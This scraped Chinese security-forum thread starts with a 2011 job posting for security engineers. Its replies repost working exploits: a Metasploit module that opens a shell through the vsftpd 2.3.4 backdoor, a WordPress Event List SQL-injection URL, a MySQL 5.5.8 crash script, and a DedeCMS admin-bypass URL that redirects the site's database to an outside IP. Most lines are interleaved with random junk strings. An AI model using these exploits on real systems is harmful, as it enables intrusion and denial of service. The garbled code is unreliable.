Board logo

标题: [人才招聘] [招聘] 启明星辰研发招聘 [打印本页]

作者: 小妍    时间: 2011-3-4 13:57     标题: 启明星辰研发招聘

站内发信给我就行了。  n+ X4 z, }% H
, N$ s5 `6 p0 M4 \' T. c8 I

一、研发中心:Linux C软件工程师(若干)

岗位职责:

1.
6 V$ \! c% C' H3 P( s7 q/ D安全网关,防火墙,IPS等嵌入式设备软件开发,维护

岗位要求:

1.! h0 }% y& C9 ]$ ?- t; T
精通C语言编程

2.  `1 g' Y! m+ k# u" ^; K8 `" T
熟练使用Linux操作系统,精通 Linux下C语言编程

3.
0 h/ _2 s: H' k; |$ S2 `精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

4.
7 N6 ]! T0 K% e( z* v* V熟悉网络安全协议及路由器、交换机、防火墙等安全设备

5.4 A7 p! F  h0 [
熟悉Linux内核及开发

二、研发中心:测试工程师(若干)

岗位职责:

1.: c' k8 A; t# |' g4 Y! q+ g9 d
负责产品的系统测试、集成测试工作

2.& A* S2 K; q7 V8 K/ R) D! q
负责产品用例的编写,执行、修改

3.3 N! [, B% z+ g; b/ `- P
负责产品性能的测试

4.6 q. N/ F% w. \$ Y
负责对外项目的支持和测试工作

岗位要求:

1.! \: m1 z3 h- z  x6 X/ W/ v& B" Q
掌握基本的tcp/ip知识

2.
( i0 G# d7 n3 K- ^9 y6 i9 k数通基础好

3.9 p! L; i6 j$ ]; @6 w& e
对linux有一定的基础

4.' c: ?: Z1 G9 m$ E
掌握数据库的搭建和使用

5.
9 J( p: I( y, R" A3 q0 `5 F/ N/ [至少熟悉一种编程语言C/Perl/VBS/TCL

6.) \# \3 Y  a/ g3 i: Q
熟悉测试用例设计,熟悉系统测试,熟悉压力测试

7.4 W6 P3 j! l) e. x7 P& I
熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

8.; T( ]* Z# k2 }7 n
对网络安全设备在网络中的部署有一定的认识

9.) U# l2 z4 r, ^+ S
掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

三、研发中心:安全事件工程师(若干)

岗位职责:              

1.2 k! r5 s! `+ ]8 c8 P* d1 F  `' \
木&马检测服务、WEB漏洞扫描服务的实施

2.+ }5 {1 {- d& i. b; E
对服务客户的技术支持

3.: e1 B# \0 x& x3 E# @* ?* k' ~
对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

4.3 H  Y1 |- |) U" _* [- p
对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

5.
+ @0 h5 P' u: ]2 S' G
对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究


作者: hushui8878    时间: 2019-5-27 12:02

VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################' |; U9 X, |* M# o$ C# G6 c1 w

( N* q: b! w& g" V; N2 D4 S' L
1 ~- K8 \& u) ?: p! e9 ~, a* {1 _4 ?
require msf/core
- f2 h7 H; k' m: R, w3 }/ B6 n1 e5 R  K
# ?0 h3 I+ u' ^0 Z+ P; k+ s$ o2 D6 Jclass Metasploit3 < Msf::Exploit::Remote
8 _) r0 Z9 z& t+ ^/ D% V$ K8 L. V/ ERank = ExcellentRanking
. y$ ]# b: r, I
( V& J! }. b  w& r1 v9 L  R, cinclude Msf::Exploit::Remote::Tcp5 Y8 l- ^9 Q! _, g

" |' b7 s/ d7 l, k2 _5 Y- V, {, X. ?3 Cdef initialize(info = {})( W# ~. Z3 W, w$ F, ~- s" I# s2 H
super(update_info(info, e/ Y4 y/ f! I) R5 z
Name => VSFTPD v2.3.4 Backdoor Command Execution
, \1 E0 K# o0 GDescript_ion => %q{
8 {8 G, v/ E2 [9 G$ C& W- A: @* i* {This module exploits a malicious backdoor that was added to the VSFTPD download
6 v$ M1 X! W: H$ ]archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between* D0 e1 I3 r# Q, g8 Q
June 30th 2011 and July 1st 2011 according to the most recent information
. X8 k: q- V# v) Zavailable. This backdoor was removed on July 3rd 2011.+ y5 H6 r8 y! q3 d1 W/ H+ b
}
  b9 E* d% h8 Z8 v" B( s* b- D! ^Author => [ hdm mc ]$ N) U: k+ D" i# H* K' |
License => MSF_LICENSE2 w3 j' h, V" A
Version => $Revision: 13099 $
  E4 L: B4 G* \" UReferences =>$ i1 l5 F4 o9 ^' ^" [3 _
[: ?; s+ ]! P& A: t) p/ K7 j
[ URL http://pastebin.com/AetT9sS5]) M+ l9 U+ m; w8 c0 n& H) x
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
, n2 H4 Z, M! \) C+ _+ g! R( M$ r]
. t% v; _0 j/ ~5 r( Y" W6 `Privileged => true
" B& C1 e$ V/ {3 l" \Platform => [ unix ]
! M, H8 k5 V9 k3 E- l4 U$ kArch => ARCH_CMD; T. ~0 k6 e, p2 z8 b, V4 U
Payload =>
+ ]) X( ?. A' O4 a$ f  w{
6 a0 c, m7 \7 Z' d+ v* }Space => 2000* t! f8 o+ {# r; {' z1 {
BadChars =>
, Z  [# M  \0 C$ H8 j- rDisableNops => true. j) n1 {' @; @+ Z7 H: N
Compat =>
& R2 S! C" Q, r: E5 L{9 U  P! P  D9 w; g% K& P
PayloadType => cmd_interact
1 U- w; |9 N: _( i3 J, zConnectionType => find
) R; d1 [. ]) E7 w7 y4 K6 q4 ]}
: E1 r' j" j' X/ J7 V* o+ S! Y}7 [; B. `! W3 W/ T( s
Targets =>  W1 c* a. T' a, U
[
7 t# C$ l( {7 t) c9 o[ Automatic { } ]7 O, B' U2 u* @" d. L
]7 M$ |8 t3 v' H- c
DisclosureDate => Jul 3 2011! @: Z% u7 S1 U/ h+ }& \
DefaultTarget => 0))
9 ~7 i$ S1 u8 a+ M0 d) r, `, V, U& r1 v
register_options([ Opt::RPORT(21) ] self.class)) d! s( T8 U) \( u+ d/ t% n) m
end1 O/ R8 a7 f1 P' o, q
, I8 W5 `" t4 ^4 r, ]
def exploit
; q, L+ g9 h! ^/ u/ x9 u
, v7 z" }9 I2 Z# Gnsock = self.connect(false {RPORT => 6200}) rescue nil
% z& A8 B- ]6 m" ^% ?( i$ l5 H+ Aif nsock
2 c: X# G9 T4 q  Cprint_status(The port used by the backdoor bind listener is already open)" G8 {: j7 y2 U1 a! k8 |
handle_backdoor(nsock)
/ O9 R% [5 w8 T; [return) v( r4 g% d# r; x2 G$ u
end
6 c- s3 p) X5 b0 d6 c* g
. ~( F& r: v. A) i& v  Z% t, F# Connect to the FTP service port first
) g4 B# K/ N5 u6 T* S  jconnect
' b5 B# N# y+ f& q+ K
6 I) r$ c) S6 X7 p3 }+ Y5 Rbanner = sock.get_once(-1 30).to_s6 Z3 S' D$ v2 a5 S7 h
print_status(Banner: #{banner.strip})
& I5 j1 E: ]5 t6 H$ Y6 L$ E  x- N7 t1 Q9 ~5 j0 ]6 A2 s  T
sock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)! u" X* ]/ r5 S# q, Q% D
)* p' E8 P  j8 m
resp = sock.get_once(-1 30).to_s6 T0 M# ^$ M9 W4 n; j& Q, {
print_status(USER: #{resp.strip})9 F! w; I9 _' i, G: U

1 {6 ^3 {4 S! @2 b: p, u" v. eif resp =~ /^530 /9 \0 U) U* z. H& _4 Z+ F" t  o/ ~
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
/ q8 g* i8 R# U  e% C* I, D7 idisconnect
+ X+ ^2 m( J2 X  Xreturn
/ \( z8 @; A0 M; ~) q% tend, M" b0 J9 d, [- D- N6 B# d4 [

3 X. G8 ~7 Z1 E5 ^if resp !~ /^331 /. p2 o/ h5 w* @  `
print_error(This server did not respond as expected: #{resp.strip})' t8 r" k  M" N
disconnect
: N- k; d$ O- H- U$ R: }return
# P/ ?5 i: Y. u) ~7 u+ Wend
: E4 H8 ~' w6 e  P2 a3 O6 N4 R+ o  t
& |2 C2 ]' c! xsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
2 C- a3 z- d: Z2 n. n)
% z4 d7 g  c3 k) h4 P  K  o1 A' t  v! O
# Do not bother reading the response from password just try the backdoor2 Q! h, Q, x3 L8 Y4 y
nsock = self.connect(false {RPORT => 6200}) rescue nil/ y* F! J0 w# a; m0 u0 s4 V( y
if nsock& L$ U  E, t' ?
print_good(Backdoor service has been spawned handling...). q- n& O. [3 u+ u+ L- T- }6 H
handle_backdoor(nsock)
* v$ P$ C/ v- L$ yreturn" T% i4 b+ w/ W8 e! Y
end
" z% U+ u/ q# J; z. l+ E% e
. \1 ]. z$ D: J8 a4 k: r1 ?& ~0 J3 fdisconnect; T" ~% f$ b" f# z. q
+ M' ?4 [% R7 n/ e- Y* |
end
4 x% P0 N+ B0 b! m$ T* a5 A. P& ]% P% U% B
def handle_backdoor(s)
% j0 l0 ]3 A3 A7 p. `5 {
( Q$ c3 S! F" T) q3 g& X4 Us.put(id
: O9 A' s% m5 F* Q( r* s)4 q& Q" P3 f" ]: `
3 p3 c# U5 v5 g  V5 r
r = s.get_once(-1 5).to_s
  u( {% q' H7 nif r !~ /uid=/0 i2 J% B0 w6 f1 E
print_error(The service on port 6200 does not appear to be a shell)( X/ T9 [# |8 x6 p; m8 @
disconnect(s)7 w% D- }3 c3 O/ z% z9 S
return8 C( h( {0 Z1 T- A
end3 K# Z# `4 K& y+ J5 W2 m

0 W8 M. u) M  N: R1 e9 oprint_good(UID: #{r.strip})4 h7 @. t) Z  z' V; W

' B  w" h3 [3 b  G6 J( P8 Ms.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
* i1 w6 C& J% n( g$ O. }% {handler(s)! B; d( n( A) C0 c, f
end5 L0 X+ M. Z9 y4 m7 u- p; X
0 Z1 ]$ t/ }% U* w: ^
end复制代码
1 ^2 M4 ~& P0 \; R( {( N/ z) y
# {1 }3 k4 U' B' f6 J* N# ]+ j4 U3 ^" Q! k6 c; k' ~- Y7 x# \7 v9 o
6 v$ E6 u( m8 @7 a% }& T

: ^6 r! n+ U, u1 `& ^+ H$ _
: P0 F9 {% Z$ x1 G
! @* V# I& {- e0 [% y2 @
+ B- V7 N! ~+ z) \1 ^, T( o2 K$ h3 [' Z- V' X. F* \8 H( L5 j: A

" w9 |- y/ W) s; S% r% w/ `+ j1 z9 U8 z- I& m% j
' x1 E, ?3 R, {5 Q. X# P% w6 }
# c8 u# `8 ^0 I/ z! E5 w$ l

% q7 Z3 A) f# j; {4 P- ^% }; o1 x' Q! X% B' x: w' D/ \, v
( ]1 q) q/ J4 J# V' W
  Y2 B6 ]' s! v, ^2 j9 a* q

; C& P, q% H+ k, N5 Y! s$ B! b+ J1 m; t1 s- e/ z
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: loye13    时间: 2019-5-29 23:01

WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
1. Description:
- L6 h: M3 r& h/ F  
1 V6 [$ V& W* k$ g; N7 j     
: I& C" }' h+ _* f  0 A5 B  D( q# y$ {
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
& ^* q/ @8 h" iallows an authenticated user to execute arbitrary SQL commands via the id; D7 A# T/ r; N# w* p* E
parameter to wp-admin/admin.php. & E: {) b1 I& z1 N% ~
  
) K6 L. Q: C) u$ s( ^   
$ S+ @! p6 @2 h- C  
2 _2 B, Y- Q: O. R1 ^! {4 p' H2. Proof of Concept:
7 V2 |- p; g/ G7 {( F  
! ~3 [, J% a; f2 p% w   
) p% k4 B' ]3 R  k# Y) i. b1 }1 q    C0 D' w& L  i5 _, x4 T5 K
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id7 T( T, o1 |+ h2 o0 Z
=1 AND SLEEP(10)1 I/ W: s8 [; r5 Z- _' U: Q5 R

( h2 d. Z4 o8 L  7 ^  m! t7 d/ E- n; Q* a
   - @6 D1 R- u, C0 l
  
% {: G* Q- Z8 i# x8 O3. Solution:! \  N% Q/ h! j
  
, g" Q8 I$ z6 U8 g     ! v: K- j; y* }
  # B6 a. ?' J, \6 ]8 ?4 ~9 A9 [, D
The plugin has been removed from WordPress. Deactivate the plug-in and wait4 X0 J' J5 {+ @( t0 }
for a hotfix.
' k: G1 b/ X6 O( ~2 f5 R9 C0 A  
  e' s9 o; n. e& j" P' L" N   
5 l* I; R! d* a0 P' Y  
, s/ j6 L' ]9 c& U5 r4. Reference:
- S' {' z/ b: ~1 \2 z2 Y  
) E9 P4 u5 [; i: L( Y  q6 ]9 N  r   / N3 `; L, r1 y7 L
  2 h. K+ [, R" S- h8 w6 |
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje! D. [6 |5 [' y* D) {$ p# `4 Q
ction-sqli/" C, A# W2 T- B. \% o- h
    ^* L! @+ x$ ^  D% e& b
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-94292 W$ C0 c6 z1 L/ `% ~
4 b' E+ [# v6 }  \
8 X; }- j# C5 T& ]. W8 p

9 X0 f7 w5 v4 `# ^+ p9 M1 V% m
% j# ^* f  U$ ?9 M8 v1 A# \- U) t( n& J# J+ l( F' [& T
  B; l4 f  L/ D0 A7 |4 J

6 g0 M1 w3 `1 F. j. ~. m
- O$ r" V0 W  ]: S/ _7 [5 ^* f7 _/ B; f8 ^( Q" [# Y2 C# U
9 _+ X- l6 N9 l

8 ]" ~% Z( k0 I
. `5 C: \- n7 U) g* z$ [2 b
7 U' [1 p5 I) k4 B$ p4 N
% c( T% S, U+ j) Z
3 T6 W& b) e+ L3 U9 T7 L% m4 K, G, ?4 c5 h2 p
" |$ r* O* S9 I
9 ]- ~% b# ^5 }' e9 E
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: dg86760517    时间: 2019-6-17 23:01

MySQL 5.5.8 远程拒绝服务漏洞
import socket, sys$ e9 d8 S1 U, @6 m7 x1 M
. e6 A: @9 y8 x7 |
print ": y4 E7 Y9 y! Q, s6 F
"
: Y& ?( \4 T4 V) G( |1 G  t! }print "----------------------------------------------------------------"
" A, C  F6 w" K! Rprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
4 O: O7 f' V. Kprint "| Level Smash the Stack                                         |"3 r  _$ q$ J, ^
print "----------------------------------------------------------------"# o" B3 D! @& A, g
print "; r4 t& ]0 I. ^+ O
"
) E. z( L$ _0 ], R3 P  C# b) z. z & Z/ _/ b/ G# F& [8 O
buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"' t) C# S1 |! h" [: z
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
0 D0 [# J; S* U1 w6 f- \   X9 b" g9 _. M0 G4 O
buf2=("x11x00x00x00x03set autocommit30")
2 Y+ f. Y& V8 s- y& ~! d: K
  o" n4 K% e2 N' ddef usage():
6 D4 q4 b( h1 `% a; o4 ^7 a  b* D- lprint "usage : ./mysql.py <victim_ip>"
& D0 ?+ j. i* g7 a1 Sprint "example: ./mysql.py 192.168.1.22"
, e+ c2 r3 V0 x' A" ^; _" _ & P* ?( q, z4 }+ R/ b( I
" D# o2 @1 ?4 `1 {; V, g
def main():
) R4 S, n% J; ?/ zif len(sys.argv) != 2:
" W$ F% @  M0 S3 P# ?usage()  t: V& w3 i0 @* H% ]/ N
sys.exit()' M: _+ Z2 B  ^+ J& ^( e- r/ D( P
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)' X. G" l2 K$ @+ `) B

* E' p- p! b$ n2 ?0 u6 o) @HOST = sys.argv[1]1 I% y' W6 b. p8 Z( m) T3 S2 W: _
PORT = int(3306)7 A2 s5 H! ?! t1 i
s.connect((HOST,PORT))
; [4 A6 ~7 q6 j/ W! o, ]3 lprint "
  • Connect"0 N/ T. [1 E# X& c! w
    s.send(buf)8 I5 O* j  z4 @3 ^7 z: j
    print "
  • Payload 1 sent"
    3 y  B9 {) h6 ~) c6 p' c  A3 F7 F* F5 Q! es.send(buf2)
    3 x" e/ B8 N: G# @) s7 rprint "
  • Payload 2 sent
    ! ]8 ^  K1 v! p* Y- P+ c! n' [; M", "
  • Run again to ensure it is down..% t" A& U2 A( n; r! G" i* Y
    "/ S$ P' k4 d4 r% l' }! y2 J
    s.close()7 H6 M! j) |, n

    ) h- H  K: H( b/ Y( r0 b7 B; a% yif __name__ == "__main__":3 {; x2 W4 p. q
    main()9 I" r/ l' |3 G* N$ |5 E/ q4 g

    ( ?1 F+ [. w' T  C% r: ?7 b6 n) [3 }* D, u( O+ K

    : E+ L5 ?+ z2 P: R1 D3 X$ t* {8 s% C; |- d% H; A* V; d
    " ?$ P5 m( V1 b+ P8 q$ W
    , I+ q" f1 u" P7 o

    - T% k; q9 M% i# {5 A' S; ?8 j3 l7 s6 d2 S2 ^5 \8 P
    ; S+ p5 X! m0 {6 P
    ; o5 {0 y4 z+ {' F3 k+ |. |# |, I
    ' t; V$ _' c# ?+ p$ \% K
    " X- V+ ~7 m8 P6 E( r5 ^: o
    # d, T8 Q% `# R
    - |$ e& [+ N. _1 J* \9 g+ }

    0 e: p8 u  r3 ~- C7 ]1 ?0 {6 {$ R5 @/ D/ K: \
    8 |7 P8 E3 @( c0 Q* J$ z
    / z2 o8 z+ w) i8 ^: }9 q0 x+ |
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 二级菜鸟    时间: 2019-6-20 23:57

    手把手教你装Linux系统-设置虚拟机
    % \8 A1 O" i4 Z7 l
    http://www.sitedir.com.cn/video/4.swf5 t8 r* ^5 y. ~+ O3 P
    ; I% T/ c/ K+ I- [
    2 l( B+ r  [% [1 G7 J; X/ f

    , c% ?7 E- b0 m
    - \) b" e: {& g* b
    ' Y5 C  X7 B% c7 y! x( }( W* L" h: T2 e& K4 g
    . t" F8 K- Q) q

    ' `9 [' @, ~1 c; u) n0 Y" N2 S
    . R9 ]& v! f2 |* B
    1 y- f& e1 h7 T; k0 a$ a/ Q8 I5 A7 ?  U

    3 \5 N8 X2 P! G$ N0 }1 _6 B  _: r
    ' k/ R$ H5 {8 a/ V4 V8 W: E3 v3 U& S7 a* V2 p4 |, c, ^/ C
    6 @0 ^1 ~, }4 U; ], `( D9 `

    % C# \) b; f: G# z
    # d* X! e8 o  s$ J) j: a  |
    & r8 Z$ d7 j( e. P) q公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: arja    时间: 2019-10-12 23:20

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    7 R4 P! i0 |' h! q
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    0 N0 C  E6 c' M) R, S' t  @
    此漏洞的前提是必须得到后台路径才能实现
    0 h7 r  |+ @8 t. L  G) b
    官方临时解决办法:
    2 p( P  O+ O2 V5 n% c# J
    找到include/common.inc.php文件,把:

    % p, d! f4 B2 A& l( D& N
        foreach($_REQUEST as $_k=>$_v)  P1 w& U; @* ~. m+ z* h/ _2 B
        {
    4 X5 L' n/ E7 O; x        var_dump($_k);! L, @8 w7 x" }$ R
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    # N- Q$ }1 ^  d/ [: B        {' i4 t- E) W; Z) \, k- B+ j
                exit('Request var not allow!');/ D* ^( k7 Z, Z
            }
    . e3 H3 D# [6 F* i- @    }

    0 n6 \' p' Q* l! k; d* [% R/ Q
    换成:

    0 J$ P; S1 w9 l: a+ z& k7 A2 T
        //检查和注册外部提交的变量. J& w" n8 Q$ h0 P  M
        function CheckRequest(&amp;$val) {
    6 {$ f) J# P9 ^# q        if (is_array($val)) {; A# C' z! R9 I) \, s; J) a
                foreach ($val as $_k=>$_v) {
    , m$ [8 K; B- Y4 U# F! P  ]  p) b                CheckRequest($_k);- g" e6 s' H" Y& I
                    CheckRequest($val[$_k]);( |# A4 A6 v  E" C- l# O  R
                }9 A3 T& S8 R% m
            } else
    ; s) l& L- O8 R; Y6 A& s        {
    4 u3 [+ G' n  ~: S1 R" E" r- s            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )  ^( \+ n' F2 J. I
                {5 G- @$ |  L- W+ k1 D3 I
                    exit('Request var not allow!');
    2 R( H  c9 D. |3 r% ]% ?7 V            }
    % y2 w* Z6 O0 W# u* @3 w( m6 L        }8 ]' W4 x; m# ~7 u& l9 L
        }
    ; Z9 P/ V1 |0 s    CheckRequest($_REQUEST);
    7 J& i7 r& ]* a' E+ u' ?( m
    0 G" a  x9 [7 R4 F0 _! ~' `; [
    0 u4 b8 y; @7 b. o8 V, i
    ! E9 A; T. k- q9 ]& V& `+ H0 V6 `* r
    + J) E: D& B5 x# a  H. ~$ ?

    $ B: @/ Q5 ~" b, l" I
    9 H# T  o' S: z" Q! W% H! n$ ^$ m' [. I( r

    # W7 U7 p5 k. ]4 K6 I' F( p" [+ A( R* R' g8 p  P) E0 v

    ) U! t$ ]% h+ @; j3 E
    1 N- f2 n+ ?: x$ U7 _' j& G
    6 O! m2 u: a3 E" O& n& b
    : K: }* T8 `0 q* {4 v
    8 t8 J; n1 T  M, x; j) K7 _
    0 }3 U; {4 G; F9 n" ~- L2 V3 k
    ! ?$ G) i5 \2 v- M
    9 Y( `" b+ i. Q, G
    + d* Y/ t5 Y/ Q% I% s1 Y
    ' W3 W0 I6 {  Q公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 若凋零子爵    时间: 2019-10-14 23:55

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    # {2 f! o/ X, k, F, e9 {$ x4 Z7 V: {. a6 c' f: z% W
    http://www.sitedir.com.cn/video/8.swf[/quote]) F; S+ y  b) m( d0 ]' C8 T
    6 E5 g1 F* h1 r0 z' O2 k

      _+ _: _% w8 ~$ U% N9 u. E: J& R
    ) {2 }, |9 w) Z1 |7 T+ P* @9 J8 q
    ' ?( e1 ^- x( H3 u6 {3 Q2 I, ~( r
    ( B; K% ]6 t( a5 ?! z* I1 O) J
    . n) F% d3 h# f0 @. B. Z

    / n1 L6 o8 R0 e- x2 A, C8 J
    0 k3 `# X" I3 u2 B) K) v/ k/ v" H8 h$ v$ k

    ( A$ s* ^. t9 Z/ V- d/ C1 \& |4 Q- S* t: V
    & |# j; t) H' x& t. y
    , C& c4 @/ {# {" P3 Z) e- c
    " }  C  S( U5 f6 k9 \. n4 g3 A
    : L  R/ }1 q1 I9 ~+ Y! m+ |; [& s

    2 G) `8 A. e4 u8 t
    5 Q; E- _* l& k+ j' `5 X- g; ~( [$ v公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-24 23:20

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    ) q8 N" ?' p4 Z+ V- P
    影响版本:8 Y& [) z. k" N
    Django 1.2.5* |' \3 n0 @* ~5 B  m% s
    Django 1.3 beta 1
    * [$ f$ `  ?1 P% m: g$ gDjango 1.2.4* k9 _+ o0 J; J, |1 U6 e
    Django 1.2.2
    4 U9 ?: _. @- o( K# _Django 1.2

    ; q+ v. x4 S: N0 H$ K6 u
    漏洞描述:
    8 `, M0 p4 c/ q" v0 S. D) x$ F3 S
    Django是一款开放源代码的Web应用框架,由Python写成。, i7 c0 M3 J' W6 w, f" R/ H
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    ' ]/ I2 j6 q# F6 U2 K" L, t  p1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    4 _) T' g/ n; M" B* b8 L: [7 P2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。1 B8 Z: g, l) o  J
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。, U- u$ e( D5 @' Z3 q
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    4 j2 ?3 w/ Y* d; E2 U) N( y. J
    细节参考: 7 @. q" D" }6 o7 B) O$ |9 Y% y
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    % z) c. K4 D4 \$ U9 S# Zhttp://secunia.com/advisories/45939/

    / d# v4 ^$ x& i0 ?+ l# H
    # s# D- x) ]( D
    " g$ K% `: t, u  _
    + E3 {9 }% W: K5 S

    ; h2 ]. i( |2 Z, r
    ' _, B5 _% \' h1 D( C9 R' T; r2 E2 z6 E5 M  }2 o0 d! x
    7 r, f: d( Y5 N& f& G7 F% a
    # P, B0 B0 E* G7 k% H+ }( C

    - x3 t2 R0 j; N! z, j  [( W, ^0 B& d4 z2 P0 n
    6 S  z4 r7 x! a: n% b/ E
    5 j: v' u* W% j4 a5 M- Q
    ! e# [1 f1 K" R
    , _8 m6 a, U# K5 w) Y  R; T* a3 M) r

    # z  r9 \" N3 w1 W# R. ~
    ) N! E3 Y! {# N+ ~8 Y8 U! F3 T. ^( K* y/ L

    6 V% N; J( t4 p3 z
    ' A. J6 p! M# n公告:https://www.sitedirsec.com公布最新漏洞,请关注
    作者: 奶妈    时间: 2019-10-29 23:55

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code1 r2 l. E) G% g/ {: Y; p
    影响版本: McAfee LinuxShield <= 1.5.1
    7 R8 R# F: U% g3 E" q$ i3 i8 i! ^远程攻击: Yes : {3 k+ o  {6 d6 @, n
    本地溢出: Yes
    + @' }3 \6 ^, |% K: S背景阅读:
    ) `, }9 v7 }5 ^# B) I& e$ T7 a# X===========
    " Y) i% L# _* ~' C& j$ S. ^3 X9 }8 V2 H2 H9 a* M" q8 n
    LinuxShield detects and removes viruses and other potentially unwanted
    ) Z1 E5 B5 z2 Y7 k) Esoftware on Linux-based systems. LinuxShield uses the powerful McAfee
    7 S# v9 ?, ^- ?scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our0 w6 X7 ^5 U  W  T, s3 ^
    anti-virus products.
    / Q+ s7 }7 n% I5 [
    - w; h  r( m9 ]+ S1 D) q: YAlthough a few years ago, the Linux operating system was considered a9 T+ u3 |; Z! c- ?
    secure environment, it is now seeing more occurrences of software
    1 v& O1 z" e8 B9 aspecifically written to attack or exploit security weaknesses in
    , b2 W3 t! q2 \( i) x5 _) w5 kLinux-based systems. Increasingly, Linux-based systems interact with8 E$ C+ x& r$ a* {( J% a) P
    Windows-based computers. Although viruses written to attack Windows-
    ( q& j2 V/ ]0 f) d  h! ~7 ]8 Qbased systems do not directly attack Linux systems, a Linux server
    & @4 c! C0 `1 T2 j6 o+ B) Pcan harbor these viruses, ready to infect any client that connects to
    . h" Z9 x3 Y- {) lit.
    3 o& j4 }' r8 s% S7 n$ L- y7 H& s  D; b
    When installed on your Linux systems, LinuxShield provides protection) u* M4 q% m  I
    against viruses, Trojan horses, and other types of potentially
    / q! G9 a) T. w) ^0 Wunwanted software.! y# y/ B& C  v0 u7 w( L" ^' I; n
    $ d8 ~( _, @1 l. o+ l) V$ C6 ?
    LinuxShield scans files as they are opened and closed8 _% C8 f8 b3 w+ A5 X* v4 h6 ^+ ^
    ?&amp;#65533;&amp;#65533; a technique: A/ y. }  m( z/ Q
    known as on-access scanning. LinuxShield also incorporates an8 |. X- O4 k. F" N5 F: M
    on-demand scanner that enables you to scan any directory or file in! j6 }; r( E5 C! p
    your host at any time.
    ! T% a6 H# N1 ~  `8 P& K
    " B" W; ~1 F6 ~8 s4 pWhen kept up-to-date with the latest virus-definition (DAT) files,
    $ R1 x4 m" t( W' m0 V2 Q1 mLinuxShield is an important part of your network security. We, m+ b1 }3 ]' j" d, G; Y
    recommend that you set up an anti-virus security policy for your9 U5 D! E4 y/ j, P( B3 ]
    network, incorporating as many protective measures as possible.
    & N- S2 b" F  f' t9 v% G8 |: n. H3 N" B
    LinuxShield uses a web-browser interface, and a large number of
    , {+ Z+ r: d( N! n8 ~LinuxShield installations can be centrally controlled by ePolicy0 h, j5 X* [0 K" n& P# \
    Orchestrator.% i4 K3 O- O& c9 G! P

    7 p5 R$ Z4 n* w6 c(Product description from LinuxShield Product Guide)# r0 z: \4 e) z

    4 O. X' \9 k+ N  j, `) @1 G/ J
    , C9 }+ }: s+ x" C5 J
    , K9 D. f7 g7 g5 E8 M' CDescription:
    3 d* g1 g. f; _; S5 o============
    7 O. ~5 S3 y, C
    2 d% |+ L# m/ a; T8 VThis vulnerability allows remote attackers to execute arbitrary code/ }" p( O7 i1 M$ C( Q0 v* H
    on vulnerable installations of McAfee LinuxShield. User interaction) s0 m1 E$ ~; ~, S/ i9 I4 Z6 b
    is not required to exploit this vulnerability but an attacker must
    4 r' t. o! m# c  xbe authenticated.5 i; C/ m+ ^, R+ Q

    1 d& ?, g$ w; y% K- D: hThe LinuxShield Webinterface communicates with the localy installed
